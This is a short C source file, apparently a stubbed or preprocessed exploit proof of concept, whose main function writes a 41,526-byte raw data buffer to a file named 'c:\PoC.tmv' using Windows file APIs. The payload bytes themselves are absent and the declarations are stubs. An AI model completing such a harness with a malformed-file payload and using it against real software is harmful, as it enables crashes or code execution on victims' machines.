
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ HANDLE ;
typedef int DWORD ;


 int CREATE_ALWAYS ;
 int CloseHandle (scalar_t__) ;
 scalar_t__ CreateFile (char*,int ,int,int *,int ,int ,int ) ;
 int FILE_ATTRIBUTE_NORMAL ;
 int FILE_SHARE_READ ;
 int FILE_SHARE_WRITE ;
 int GENERIC_WRITE ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int WriteFile (scalar_t__,int ,int,int *,int *) ;
 int exit (int ) ;
 int printf (char*) ;
 int rawData ;

int main(int argc, char *argv[])
{
 HANDLE fileHandle = INVALID_HANDLE_VALUE;
 DWORD dwBytesWritten = 0;
 fileHandle = CreateFile("c:\\PoC.tmv",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,((void*)0),CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
 if(fileHandle == INVALID_HANDLE_VALUE)
 {
  printf("(-)Failed to Create File");
  exit(0);
 }else{
   printf("(+) Writing File ...");
   WriteFile(fileHandle,rawData,41526,&dwBytesWritten,((void*)0));
 }
 CloseHandle(fileHandle);
 return 0;
}
